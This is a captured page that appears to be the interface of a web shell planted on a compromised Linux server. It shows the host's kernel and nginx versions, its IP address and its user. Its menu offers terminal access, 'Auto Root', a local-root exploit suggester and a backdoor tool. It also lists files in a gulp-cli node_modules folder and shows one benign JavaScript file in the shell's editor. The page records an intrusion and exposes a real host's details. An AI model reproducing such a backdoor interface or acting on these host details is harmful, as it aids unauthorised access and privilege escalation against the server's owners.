Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.53
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
gulp-cli /
lib /
shared /
Delete
Unzip
Name
Size
Permission
Date
Action
config
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
log
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
ansi.js
929
B
-rw-rw-r--
2022-08-30 11:49
cli-options.js
3.36
KB
-rw-rw-r--
2022-08-30 11:49
completion.js
486
B
-rw-rw-r--
2022-08-30 11:49
exit.js
313
B
-rw-rw-r--
2022-08-30 11:49
get-blacklist.js
1.15
KB
-rw-rw-r--
2022-08-30 11:49
make-title.js
174
B
-rw-rw-r--
2022-08-30 11:49
register-exports.js
382
B
-rw-rw-r--
2022-08-30 11:49
require-or-import.js
981
B
-rw-rw-r--
2022-08-30 11:49
tildify.js
163
B
-rw-rw-r--
2022-08-30 11:49
verify-dependencies.js
716
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
'use strict'; var matchdep = require('matchdep'); /** * Given a collection of plugin names verifies this collection against * the blacklist. Returns an object with: * [plugin name]=>[blacklisting reason] * or an empty object if none of the dependencies to check are blacklisted. * * @param pkg - package.json contents * @param blacklist - contents of the blacklist in JSON format */ function verifyDependencies(pkg, blacklist) { var blacklisted = matchdep .filterAll(Object.keys(blacklist), pkg) .reduce(function(blacklisted, pluginName) { blacklisted[pluginName] = blacklist[pluginName]; return blacklisted; }, {}); return blacklisted; } module.exports = verifyDependencies;